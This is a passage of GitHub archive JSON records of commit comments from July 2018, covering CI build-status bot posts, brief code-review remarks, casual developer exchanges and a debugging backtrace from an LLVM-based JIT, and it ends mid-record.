{"id":"7973221615","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29727131,"position":null,"line":null,"path":null,"commit_id":"837aa0b90bf6dacbc89e633f0e1c791745a29a1c","created_at":"2018-07-16T22:05:10Z","updated_at":"2018-07-16T22:05:10Z","author_association":"NONE","body":"FanEnergyIndex (XuanLuoLBL) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-837aa0b90bf6dacbc89e633f0e1c791745a29a1c-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-16T22:05:10Z"}
{"id":"7973222672","type":"CommitCommentEvent","actor":{"login":"Backurio"},"repo":{"name":"Backurio/Match3Replica"},"payload":{"comment":{"id":29727139,"position":null,"line":null,"path":null,"commit_id":"c4a0887460e3d31fd43ab910b68120e5f56d5922","created_at":"2018-07-16T22:05:27Z","updated_at":"2018-07-16T22:05:27Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [implement mechanic for combining two bombs](https://trello.com/c/BwYClePN/57-implement-mechanic-for-combining-two-bombs)"}},"created_at":"2018-07-16T22:05:27Z"}
{"id":"7973225211","type":"CommitCommentEvent","actor":{"login":"tablatronix"},"repo":{"name":"tzapu/WiFiManager"},"payload":{"comment":{"id":29727145,"position":null,"line":null,"path":null,"commit_id":"9ab4deaf5bf0ff8163875a22f024a018f62f19e8","created_at":"2018-07-16T22:06:08Z","updated_at":"2018-07-16T22:06:08Z","author_association":"COLLABORATOR","body":"Ugh I thought i compiled"}},"created_at":"2018-07-16T22:06:08Z"}
{"id":"7973225562","type":"CommitCommentEvent","actor":{"login":"rob-Hitchens"},"repo":{"name":"ivowillemsen/b9lab-remittance"},"payload":{"comment":{"id":29727146,"position":null,"line":null,"path":null,"commit_id":"028bd99e70ec883644821a3b8fcd7a0551123935","created_at":"2018-07-16T22:06:13Z","updated_at":"2018-07-16T22:06:13Z","author_association":"NONE","body":"I believe your `getkeccak()` function near 116 can be restricted to `pure`. "}},"created_at":"2018-07-16T22:06:13Z"}
{"id":"7973226592","type":"CommitCommentEvent","actor":{"login":"pulkitmehra"},"repo":{"name":"harshitmehra93/algo"},"payload":{"comment":{"id":29727150,"position":9,"line":9,"path":"depths/Depths.java","commit_id":"effcb7e99a1905f7a9b31dca1daca30a5652e73d","created_at":"2018-07-16T22:06:30Z","updated_at":"2018-07-16T22:06:30Z","author_association":"COLLABORATOR","body":"Try using JUnit and maven style projects. There is a plugin in eclipse which can generate a maven project and add junit dependency. See https://github.com/pulkitmehra/algo/blob/master/pom.xml\r\n\r\n"}},"created_at":"2018-07-16T22:06:30Z"}
{"id":"7973230588","type":"CommitCommentEvent","actor":{"login":"michudzik"},"repo":{"name":"michudzik/internship_project"},"payload":{"comment":{"id":29727157,"position":null,"line":null,"path":null,"commit_id":"759dea413baa9b9bd25958544fc1e62414276c81","created_at":"2018-07-16T22:07:33Z","updated_at":"2018-07-16T22:07:33Z","author_association":"OWNER","body":"I made a mistake during merging process and deleted the whole repository. Apologies to my friends. Hope it won't happen again."}},"created_at":"2018-07-16T22:07:33Z"}
{"id":"7973230647","type":"CommitCommentEvent","actor":{"login":"zhlb29"},"repo":{"name":"zhlb29/Computer-Architecture"},"payload":{"comment":{"id":29727158,"position":4,"line":341,"path":"Assignment4/sim-cpen411-a4aii/sim-safe.c","commit_id":"f3cec78da1c303b5a213b6df7141c864a9c9ba04","created_at":"2018-07-16T22:07:34Z","updated_at":"2018-07-16T22:07:34Z","author_association":"OWNER","body":"save time"}},"created_at":"2018-07-16T22:07:34Z"}
{"id":"7973235192","type":"CommitCommentEvent","actor":{"login":"pulkitmehra"},"repo":{"name":"harshitmehra93/algo"},"payload":{"comment":{"id":29727163,"position":6,"line":6,"path":"balanced/BinaryTree.java","commit_id":"ac1112e7fd2e1d7239eefbe37ccf65a27c754edb","created_at":"2018-07-16T22:08:40Z","updated_at":"2018-07-16T22:08:40Z","author_association":"COLLABORATOR","body":"Look a concise recursive implementation. \r\nhttps://github.com/pulkitmehra/algo/blob/master/src/main/java/com/ds/Tree.java#L290"}},"created_at":"2018-07-16T22:08:40Z"}
{"id":"7973237569","type":"CommitCommentEvent","actor":{"login":"populist"},"repo":{"name":"badcamp/badcamp-2018"},"payload":{"comment":{"id":29727171,"position":null,"line":null,"path":null,"commit_id":"61fe429e159c14902a6408a52d266596725168cd","created_at":"2018-07-16T22:09:17Z","updated_at":"2018-07-16T22:09:17Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [badcamp-2018#pr-135](https://dashboard.pantheon.io/sites/0cebc770-0754-4f81-9138-24661ae588a0#pr-135).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-135-badcamp-2018.pantheonsite.io/)"}},"created_at":"2018-07-16T22:09:17Z"}
{"id":"7973238461","type":"CommitCommentEvent","actor":{"login":"quangogster"},"repo":{"name":"syscoin/syscoin"},"payload":{"comment":{"id":29727174,"position":5,"line":964,"path":"src/assetallocation.cpp","commit_id":"805a35ee22aa789acefb2631aad1b71b77deb1fd","created_at":"2018-07-16T22:09:31Z","updated_at":"2018-07-16T22:09:31Z","author_association":"NONE","body":"lol"}},"created_at":"2018-07-16T22:09:31Z"}
{"id":"7973239338","type":"CommitCommentEvent","actor":{"login":"pulkitmehra"},"repo":{"name":"harshitmehra93/algo"},"payload":{"comment":{"id":29727177,"position":null,"line":null,"path":null,"commit_id":"ac1112e7fd2e1d7239eefbe37ccf65a27c754edb","created_at":"2018-07-16T22:09:45Z","updated_at":"2018-07-16T22:09:45Z","author_association":"COLLABORATOR","body":"@harshitmehra93 : good work overall!!"}},"created_at":"2018-07-16T22:09:45Z"}
{"id":"7973239759","type":"CommitCommentEvent","actor":{"login":"1990b"},"repo":{"name":"nice-registry/owners"},"payload":{"comment":{"id":29727178,"position":null,"line":null,"path":null,"commit_id":"91c5a82fbc0622873eaf243e780c56125b737669","created_at":"2018-07-16T22:09:51Z","updated_at":"2018-07-16T22:09:51Z","author_association":"NONE","body":"Pas pour l’instant Parceque je suis un peu en retard numeriquement disons. Mais peut être que ça va marcher dans un futur proche... Je suis débutant et c'est un eu flou\n\nBaba Badiane\n\nDe : Zeke Sikelianos\nEnvoyé le :Altine 16 Sullet 2018 22:01\nÀ : nice-registry/owners\nCc : 1990b; Mention\nObjet :Re: [nice-registry/owners] it's a start (91c5a82)\n\nDit-moi si ca marche ou pas..\n—\nYou are receiving this because you were mentioned.\nReply to this email directly, view it on GitHub, or mute the thread.\n\n"}},"created_at":"2018-07-16T22:09:51Z"}
{"id":"7973240136","type":"CommitCommentEvent","actor":{"login":"woolsox"},"repo":{"name":"Q-seum/qseum-frontend"},"payload":{"comment":{"id":29727180,"position":null,"line":null,"path":null,"commit_id":"d19aa51a4f91da456557cc0c62810986a374736b","created_at":"2018-07-16T22:09:58Z","updated_at":"2018-07-16T22:09:58Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-16T22:09:58Z"}
{"id":"7973243557","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/nano-css"},"payload":{"comment":{"id":29727193,"position":null,"line":null,"path":null,"commit_id":"9bcdb7e2abcd2d73963a51eb29f5f1038e3a8f4e","created_at":"2018-07-16T22:10:48Z","updated_at":"2018-07-16T22:10:48Z","author_association":"OWNER","body":"Build version: __`3.0.0-master.73`__ :crossed_fingers: [`master`](https://github.com/streamich/nano-css/tree/master) on [*CircleCI*](https://circleci.com/gh/streamich/nano-css/73) :tada:"}},"created_at":"2018-07-16T22:10:48Z"}
{"id":"7973244593","type":"CommitCommentEvent","actor":{"login":"1990b"},"repo":{"name":"nice-registry/owners"},"payload":{"comment":{"id":29727195,"position":null,"line":null,"path":null,"commit_id":"91c5a82fbc0622873eaf243e780c56125b737669","created_at":"2018-07-16T22:11:06Z","updated_at":"2018-07-16T22:11:06Z","author_association":"NONE","body":"Ok. Là je ne suis pas a our. Mais pourtant tu écris bien français \n\nBaba Badiane\n\nDe : Zeke Sikelianos\nEnvoyé le :Altine 16 Sullet 2018 22:00\nÀ : nice-registry/owners\nCc : 1990b; Mention\nObjet :Re: [nice-registry/owners] it's a start (91c5a82)\n\nSalut @1990b\nJe vais essayer en Français. Allons-y!\nCe truc la est une collection de comptes des utilisateurs de npm. Ceux qui publi les colis. (Oh la, mon Français ecrit, c'est degeulasse!)\nSi tu as un nouveau-ish version de npm, tu peux taper npx trymodule owners pour voir la liste d'auteurs.\n—\nYou are receiving this because you were mentioned.\nReply to this email directly, view it on GitHub, or mute the thread.\n\n"}},"created_at":"2018-07-16T22:11:06Z"}
{"id":"7973247446","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29727202,"position":null,"line":null,"path":null,"commit_id":"7031828ea2ab4479be77c375e98d10b322313e5f","created_at":"2018-07-16T22:11:52Z","updated_at":"2018-07-16T22:11:52Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [circleci2r](https:///docs) Multidev environment:\n- [.circleci/config.yml](https://github.com/pantheon-systems/documentation/commit/d4626c91bdc0702df9f9f5cdf5ead570569f7401/.circleci/config.yml)\n- [scripts/deploy-live.sh](https://github.com/pantheon-systems/documentation/commit/d4626c91bdc0702df9f9f5cdf5ead570569f7401/scripts/deploy-live.sh)\n- [scripts/deploy-multidev.sh](https://github.com/pantheon-systems/documentation/commit/d4626c91bdc0702df9f9f5cdf5ead570569f7401/scripts/deploy-multidev.sh)\n"}},"created_at":"2018-07-16T22:11:52Z"}
{"id":"7973247571","type":"CommitCommentEvent","actor":{"login":"kcmr"},"repo":{"name":"IBMResearch/code-sample"},"payload":{"comment":{"id":29727204,"position":null,"line":null,"path":null,"commit_id":"de71e288d471851f51e8a49af3f9ff797e90697f","created_at":"2018-07-16T22:11:54Z","updated_at":"2018-07-16T22:11:54Z","author_association":"NONE","body":"Maybe tonight, maybe one month later... :/\r\nSorry for the delay. I've just published v0.4.5 with your suggested change.\r\nThank you for the feedback :)"}},"created_at":"2018-07-16T22:11:54Z"}
{"id":"7973248115","type":"CommitCommentEvent","actor":{"login":"ThaTiemsz"},"repo":{"name":"DJScias/Discord-Datamining"},"payload":{"comment":{"id":29727207,"position":null,"line":null,"path":null,"commit_id":"1e644b8b25654e4be3c698b24eb00f283faec275","created_at":"2018-07-16T22:12:04Z","updated_at":"2018-07-16T22:12:04Z","author_association":"COLLABORATOR","body":"## New strings\r\n- `PAGINATION_PREVIOUS: \"Previous\"`\r\n- `PAGINATION_NEXT: \"Next\"`\r\n- `DISMISS: \"Dismiss\"`"}},"created_at":"2018-07-16T22:12:04Z"}
{"id":"7973254013","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29727225,"position":null,"line":null,"path":null,"commit_id":"837aa0b90bf6dacbc89e633f0e1c791745a29a1c","created_at":"2018-07-16T22:13:33Z","updated_at":"2018-07-16T22:13:33Z","author_association":"NONE","body":"FanEnergyIndex (XuanLuoLBL) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: Build Failed\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-837aa0b90bf6dacbc89e633f0e1c791745a29a1c-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-837aa0b90bf6dacbc89e633f0e1c791745a29a1c-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-45.01%25-red.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-837aa0b90bf6dacbc89e633f0e1c791745a29a1c-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-0.0%25-red.png)</a>\n"}},"created_at":"2018-07-16T22:13:33Z"}
{"id":"7973256289","type":"CommitCommentEvent","actor":{"login":"sludtke42"},"repo":{"name":"cryoem/eman2"},"payload":{"comment":{"id":29727229,"position":null,"line":null,"path":null,"commit_id":"a6519991c11b9fb2ae30229fcdc4fba9aededdb0","created_at":"2018-07-16T22:14:11Z","updated_at":"2018-07-16T22:14:11Z","author_association":"MEMBER","body":"great, we should do some deeper testing!\n--------------------------------------------------------------------------------------\nSteven Ludtke, Ph.D. <sludtke@bcm.edu <mailto:sludtke@bcm.edu>>                      Baylor College of Medicine \nCharles C. Bell Jr., Professor of Structural Biology\nDept. of Biochemistry and Molecular Biology                      (www.bcm.edu/biochem <http://www.bcm.edu/biochem>)\nAcademic Director, CryoEM Core                                        (cryoem.bcm.edu <http://cryoem.bcm.edu/>)\nCo-Director CIBR Center                                    (www.bcm.edu/research/cibr <http://www.bcm.edu/research/cibr>)\nCo-Director National Center For Macromolecular Imaging                  (ncmi.bcm.edu <http://ncmi.bcm.edu/>)\n\n\n\n> On Jul 16, 2018, at 4:25 PM, James Michael Bell <notifications@github.com> wrote:\n> \n> Changes fix deprecated Numpy API warnings and seem to prevent prior segfaults involving EMData and Numpy objects sharing the same memory\n> \n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub <https://github.com/cryoem/eman2/commit/a6519991c11b9fb2ae30229fcdc4fba9aededdb0#commitcomment-29726714>, or mute the thread <https://github.com/notifications/unsubscribe-auth/AJ6i6uVbWMFvg-mmfamzcShsko1PSYq-ks5uHQTkgaJpZM4VR1Fw>.\n> \n\n"}},"created_at":"2018-07-16T22:14:11Z"}
{"id":"7973264048","type":"CommitCommentEvent","actor":{"login":"lwhite1"},"repo":{"name":"jtablesaw/tablesaw"},"payload":{"comment":{"id":29727254,"position":null,"line":null,"path":null,"commit_id":"30878f84902b941cb19a74de93ddc86e6577f101","created_at":"2018-07-16T22:16:11Z","updated_at":"2018-07-16T22:16:11Z","author_association":"COLLABORATOR","body":"They’re used for working with smile\n\nOn Mon, Jul 16, 2018 at 5:58 PM Ben McCann <notifications@github.com> wrote:\n\n> Sorry. These looked unused. You may want to restore the tests as well\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/jtablesaw/tablesaw/commit/30878f84902b941cb19a74de93ddc86e6577f101#commitcomment-29727045>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ADRXgo4qY_loHqzAZbuEkLpVTghZoyOGks5uHQyGgaJpZM4VR3eX>\n> .\n>\n"}},"created_at":"2018-07-16T22:16:11Z"}
{"id":"7973266544","type":"CommitCommentEvent","actor":{"login":"kkapsner"},"repo":{"name":"kkapsner/CanvasBlocker"},"payload":{"comment":{"id":29727259,"position":null,"line":null,"path":null,"commit_id":"47a9519cebe2fe3840c498ffafa0b245cc735fca","created_at":"2018-07-16T22:16:52Z","updated_at":"2018-07-16T22:16:52Z","author_association":"OWNER","body":"Ist geändert."}},"created_at":"2018-07-16T22:16:52Z"}
{"id":"7973266783","type":"CommitCommentEvent","actor":{"login":"glandon"},"repo":{"name":"glandon/DL4J"},"payload":{"comment":{"id":29727260,"position":null,"line":null,"path":null,"commit_id":"a5e6c3b6645d01fece8555c3188b57761a033a99","created_at":"2018-07-16T22:16:56Z","updated_at":"2018-07-16T22:16:56Z","author_association":"OWNER","body":"所有的函数，都是static类型的，class被用作namespace。"}},"created_at":"2018-07-16T22:16:56Z"}
{"id":"7973267433","type":"CommitCommentEvent","actor":{"login":"cyberman54"},"repo":{"name":"cyberman54/ESP32-Paxcounter"},"payload":{"comment":{"id":29727263,"position":null,"line":null,"path":null,"commit_id":"e2695690e3dc2cd1b0a59ab1713c3bbbf90895b8","created_at":"2018-07-16T22:17:07Z","updated_at":"2018-07-16T22:17:07Z","author_association":"OWNER","body":"Thanks for this hint!"}},"created_at":"2018-07-16T22:17:07Z"}
{"id":"7973267893","type":"CommitCommentEvent","actor":{"login":"minombreesjeff"},"repo":{"name":"minombreesjeff/darwin_env"},"payload":{"comment":{"id":29727264,"position":null,"line":null,"path":null,"commit_id":"30a9bcf29b32afa8e980e276b76908c8a1b615c1","created_at":"2018-07-16T22:17:14Z","updated_at":"2018-07-16T22:17:14Z","author_association":"OWNER","body":"Collision 18~20"}},"created_at":"2018-07-16T22:17:14Z"}
{"id":"7973268613","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29727265,"position":null,"line":null,"path":null,"commit_id":"1f061b43f649e115558060b1aaf58acdd5783806","created_at":"2018-07-16T22:17:27Z","updated_at":"2018-07-16T22:17:27Z","author_association":"NONE","body":"FanEnergyIndex (XuanLuoLBL) - Win64-Windows-7-VisualStudio-14: OK (2945 of 2945 tests passed, 623 test warnings)\n\nMessages:\n\n * 623 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1f061b43f649e115558060b1aaf58acdd5783806-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1f061b43f649e115558060b1aaf58acdd5783806-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-16T22:17:27Z"}
{"id":"7973269685","type":"CommitCommentEvent","actor":{"login":"zeke"},"repo":{"name":"nice-registry/owners"},"payload":{"comment":{"id":29727269,"position":null,"line":null,"path":null,"commit_id":"91c5a82fbc0622873eaf243e780c56125b737669","created_at":"2018-07-16T22:17:45Z","updated_at":"2018-07-16T22:17:45Z","author_association":"MEMBER","body":"premier pas: telecharger et installer node.js a https://nodejs.org"}},"created_at":"2018-07-16T22:17:45Z"}
{"id":"7973271214","type":"CommitCommentEvent","actor":{"login":"MCopeland1"},"repo":{"name":"AZASRS/DB_R_Testing_Environment"},"payload":{"comment":{"id":29727273,"position":null,"line":null,"path":null,"commit_id":"9c4ec447e632208d2e25e991966d813a013b905d","created_at":"2018-07-16T22:18:11Z","updated_at":"2018-07-16T22:18:11Z","author_association":"CONTRIBUTOR","body":"This is the updated version of 'getstockdata'R."}},"created_at":"2018-07-16T22:18:11Z"}
{"id":"7973272833","type":"CommitCommentEvent","actor":{"login":"rodolphoescobar"},"repo":{"name":"rodolphoescobar/azure"},"payload":{"comment":{"id":29727278,"position":null,"line":null,"path":null,"commit_id":"da2a4d76da6ecc9765de872b6fe00e3fd7f8c9f4","created_at":"2018-07-16T22:18:36Z","updated_at":"2018-07-16T22:18:36Z","author_association":"OWNER","body":"Ok"}},"created_at":"2018-07-16T22:18:36Z"}
{"id":"7973274632","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29727287,"position":null,"line":null,"path":null,"commit_id":"47dec17539c62fc0630686504d7801e2943bdb02","created_at":"2018-07-16T22:19:06Z","updated_at":"2018-07-16T22:19:06Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [circleci2r](https:///docs) Multidev environment:\n- [.circleci/config.yml](https://github.com/pantheon-systems/documentation/commit/d4626c91bdc0702df9f9f5cdf5ead570569f7401/.circleci/config.yml)\n- [scripts/deploy-live.sh](https://github.com/pantheon-systems/documentation/commit/d4626c91bdc0702df9f9f5cdf5ead570569f7401/scripts/deploy-live.sh)\n- [scripts/deploy-multidev.sh](https://github.com/pantheon-systems/documentation/commit/d4626c91bdc0702df9f9f5cdf5ead570569f7401/scripts/deploy-multidev.sh)\n"}},"created_at":"2018-07-16T22:19:06Z"}
{"id":"7973276420","type":"CommitCommentEvent","actor":{"login":"klizhentas"},"repo":{"name":"gravitational/teleport"},"payload":{"comment":{"id":29727292,"position":4,"line":318,"path":"docs/2.7/admin-guide.md","commit_id":"37cec0a0c3ed251216c4af03eaed2e0183c4b161","created_at":"2018-07-16T22:19:37Z","updated_at":"2018-07-16T22:19:37Z","author_association":"CONTRIBUTOR","body":"would be nice to clarify what idle means here - with no user activity"}},"created_at":"2018-07-16T22:19:37Z"}
{"id":"7973276455","type":"CommitCommentEvent","actor":{"login":"testevez"},"repo":{"name":"testevez/d8-atsnj"},"payload":{"comment":{"id":29727293,"position":null,"line":null,"path":null,"commit_id":"9d06fadadcc9d556cc53c5736d77e593b339534c","created_at":"2018-07-16T22:19:38Z","updated_at":"2018-07-16T22:19:38Z","author_association":"OWNER","body":"Created multidev environment [d8-atsnj#ci-55](https://dashboard.pantheon.io/sites/e5e4f786-50c0-497c-819e-36c05121e231#ci-55).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-55-d8-atsnj.pantheonsite.io/)"}},"created_at":"2018-07-16T22:19:38Z"}
{"id":"7973279097","type":"CommitCommentEvent","actor":{"login":"iamfibre"},"repo":{"name":"iamfibre/FibreInteriors-"},"payload":{"comment":{"id":29727299,"position":null,"line":null,"path":null,"commit_id":"8c46608e274076dd937ff6e517432e142f6410e0","created_at":"2018-07-16T22:20:25Z","updated_at":"2018-07-16T22:20:25Z","author_association":"OWNER","body":"\r\n![about](https://user-images.githubusercontent.com/38783958/42786527-252bf154-8946-11e8-85a6-32c2939d9627.jpg)\r\n![banner](https://user-images.githubusercontent.com/38783958/42786538-300a4968-8946-11e8-90fb-72cdc6d27432.jpg)\r\n![bg-banner](https://user-images.githubusercontent.com/38783958/42786541-34b18d00-8946-11e8-938f-b49d9d08c875.jpg)\r\n![bg-banner02](https://user-images.githubusercontent.com/38783958/42786566-485cb8e8-8946-11e8-9346-079ce3374123.jpg)\r\n![bg](https://user-images.githubusercontent.com/38783958/42786570-4daf626e-8946-11e8-8c26-b9a15d08b19e.jpg)\r\n![blog01](https://user-images.githubusercontent.com/38783958/42786578-525fa3aa-8946-11e8-9dba-06c783559253.jpg)\r\n"}},"created_at":"2018-07-16T22:20:25Z"}
{"id":"7973280071","type":"CommitCommentEvent","actor":{"login":"klizhentas"},"repo":{"name":"gravitational/teleport"},"payload":{"comment":{"id":29727300,"position":10,"line":324,"path":"docs/2.7/admin-guide.md","commit_id":"37cec0a0c3ed251216c4af03eaed2e0183c4b161","created_at":"2018-07-16T22:20:41Z","updated_at":"2018-07-16T22:20:41Z","author_association":"CONTRIBUTOR","body":"would be nice to clarify relationship between those defaults and RBAC like we discussed before, I've documented it in the ticket"}},"created_at":"2018-07-16T22:20:41Z"}
{"id":"7973281023","type":"CommitCommentEvent","actor":{"login":"TangledTessellations"},"repo":{"name":"TangledTessellations/front-end-project-week"},"payload":{"comment":{"id":29727304,"position":null,"line":null,"path":null,"commit_id":"e1eef85f51dee6bafdecc5c09d8618a593575aa4","created_at":"2018-07-16T22:20:57Z","updated_at":"2018-07-16T22:20:57Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Create a note with a title and content](https://trello.com/c/xkWHX5GW/10-create-a-note-with-a-title-and-content)"}},"created_at":"2018-07-16T22:20:57Z"}
{"id":"7973281735","type":"CommitCommentEvent","actor":{"login":"shawnmjones"},"repo":{"name":"oduwsdl/MementoEmbed"},"payload":{"comment":{"id":29727305,"position":6,"line":5,"path":"dockerstart.sh","commit_id":"6f20f9bb6da299516a95cd27a0f452e998096f8a","created_at":"2018-07-16T22:21:09Z","updated_at":"2018-07-16T22:21:09Z","author_association":"COLLABORATOR","body":"Thanks. I will remember this in the future. The real problem was that the `setup.py` was not installing the new subpackage. When running `flask` in development mode, it runs from the current directory and has access to the source code. When MementoEmbed is running as an actual WSGI application through `waitress`, everything needs to have been installed correctly. In fact, now that I think about it, I really don't need the source code in the Docker image once the application is installed..."}},"created_at":"2018-07-16T22:21:09Z"}
{"id":"7973282479","type":"CommitCommentEvent","actor":{"login":"Krinkle"},"repo":{"name":"JaderDias/hound"},"payload":{"comment":{"id":29727312,"position":5,"line":63,"path":"ui/assets/js/hound.js","commit_id":"25acc0683c5546d9f476abf933dba91599d1aafd","created_at":"2018-07-16T22:21:21Z","updated_at":"2018-07-16T22:21:21Z","author_association":"NONE","body":"This should perform the replace before decoding, not after decoding. Otherwise, `%2B` (a correctly percentage-encoded `+` plus sign) would also become a space."}},"created_at":"2018-07-16T22:21:21Z"}
{"id":"7973284378","type":"CommitCommentEvent","actor":{"login":"Krinkle"},"repo":{"name":"JaderDias/hound"},"payload":{"comment":{"id":29727320,"position":5,"line":63,"path":"ui/assets/js/hound.js","commit_id":"25acc0683c5546d9f476abf933dba91599d1aafd","created_at":"2018-07-16T22:21:52Z","updated_at":"2018-07-16T22:21:52Z","author_association":"NONE","body":"Fixed in 5191d4902d5cb5e6b7bc5627fa419abc5180851f."}},"created_at":"2018-07-16T22:21:52Z"}
{"id":"7973289706","type":"CommitCommentEvent","actor":{"login":"ghutchis"},"repo":{"name":"OpenChemistry/avogadrolibs"},"payload":{"comment":{"id":29727340,"position":32,"line":31,"path":"avogadro/qtplugins/quantuminput/CMakeLists.txt","commit_id":"20f755cc9724c05fb3effc415e5f4fa117a8f6d7","created_at":"2018-07-16T22:23:20Z","updated_at":"2018-07-16T22:23:20Z","author_association":"MEMBER","body":"Can we match these with a glob or reflex? I’m loathe to use a fixed list since we’ll likely add more."}},"created_at":"2018-07-16T22:23:20Z"}
{"id":"7973314185","type":"CommitCommentEvent","actor":{"login":"Maijin"},"repo":{"name":"radare/radare2-regressions"},"payload":{"comment":{"id":29727421,"position":null,"line":null,"path":null,"commit_id":"44a307ac4bc4fb0f9ca5b73f50d3e43223c78548","created_at":"2018-07-16T22:30:16Z","updated_at":"2018-07-16T22:30:16Z","author_association":"COLLABORATOR","body":"Please stop adding tests to t/"}},"created_at":"2018-07-16T22:30:16Z"}
{"id":"7973318828","type":"CommitCommentEvent","actor":{"login":"FabianWiebe"},"repo":{"name":"hyrise/hyrise"},"payload":{"comment":{"id":29727437,"position":null,"line":null,"path":null,"commit_id":"a78fcd2ce2c128e32b69e099d13b4db52e8e3039","created_at":"2018-07-16T22:31:34Z","updated_at":"2018-07-16T22:31:34Z","author_association":"CONTRIBUTOR","body":"@mrks:\r\nAs this code is not part of pr #933 I will write my newest findings here.\r\n\r\nIn the previous code, the jit operator code could be inlined as all of the operator code was part of virtual functions. The optimisation of `-O3` ensured that all non virtual functions were already inlined. Somehow the old code specialiser cannot inline non-virtual functions.\r\n\r\nBefore this last commit on this branch the function `AbstractJittable::_emit(JitRuntimeContext& context)` (`_ZNK7opossum16AbstractJittable5_emitERNS_17JitRuntimeContextE` ) was not inlined as it is not a virtual function. Therefore, all the other jit operator codes are also not inlined and I did not run into exceptions during execution.\r\n\r\nWith this commit the following exception is thrown during inlining of the first function which shows that the clone function is not working correctly yet:\r\n`````\r\n(debug)> select id  from mixed group by id;\r\nInlining function: _ZNK7opossum16AbstractJittable5_emitERNS_17JitRuntimeContextE isDeclaration: 0\r\n\r\nProgram received signal SIGSEGV, Segmentation fault.\r\n0x00007ffff43a3823 in llvm::Value::getContext() const () from /usr/lib/x86_64-linux-gnu/libLLVM-6.0.so.1\r\n(gdb) bt\r\n#0  0x00007ffff43a3823 in llvm::Value::getContext() const () from /usr/lib/x86_64-linux-gnu/libLLVM-6.0.so.1\r\n#1  0x00007ffff43a53da in llvm::ValueHandleBase::AddToUseList() () from /usr/lib/x86_64-linux-gnu/libLLVM-6.0.so.1\r\n#2  0x0000000001e941b9 in llvm::ValueHandleBase::ValueHandleBase (this=0x7fffffffb390, Kind=llvm::ValueHandleBase::Callback, V=0x3548518) at /usr/lib/llvm-6.0/include/llvm/IR/ValueHandle.h:62\r\n#3  0x0000000001e93c4f in llvm::CallbackVH::CallbackVH (this=0x7fffffffb388, P=0x3548518) at /usr/lib/llvm-6.0/include/llvm/IR/ValueHandle.h:402\r\n#4  0x0000000001e96d03 in llvm::ValueMapCallbackVH<llvm::Value const*, llvm::WeakTrackingVH, llvm::ValueMapConfig<llvm::Value const*, llvm::sys::SmartMutex<false> > >::ValueMapCallbackVH (this=0x7fffffffb388, Key=0x3548518, \r\n    Map=0x7fffffffcad0) at /usr/lib/llvm-6.0/include/llvm/IR/ValueMap.h:253\r\n#5  0x0000000001e960d4 in llvm::ValueMap<llvm::Value const*, llvm::WeakTrackingVH, llvm::ValueMapConfig<llvm::Value const*, llvm::sys::SmartMutex<false> > >::Wrap (this=0x7fffffffcad0, key=0x3548518)\r\n    at /usr/lib/llvm-6.0/include/llvm/IR/ValueMap.h:236\r\n#6  0x0000000001e9244c in llvm::ValueMap<llvm::Value const*, llvm::WeakTrackingVH, llvm::ValueMapConfig<llvm::Value const*, llvm::sys::SmartMutex<false> > >::operator[] (this=0x7fffffffcad0, Key=@0x7fffffffb710: 0x3548518)\r\n    at /usr/lib/llvm-6.0/include/llvm/IR/ValueMap.h:210\r\n#7  0x0000000001eac20c in llvm::CloneFunctionInto (NewFunc=0x5470328, OldFunc=0x35484e8, VMap=..., ModuleLevelChanges=true, Returns=..., NameSuffix=0x27dc451 \"\", CodeInfo=0x0, TypeMapper=0x0, Materializer=0x0)\r\n    at /home/Fabian.Wiebe/hyrise/src/lib/operators/jit_operator/specialization/llvm/CloneFunction.cpp:217\r\n#8  0x0000000001e8de24 in 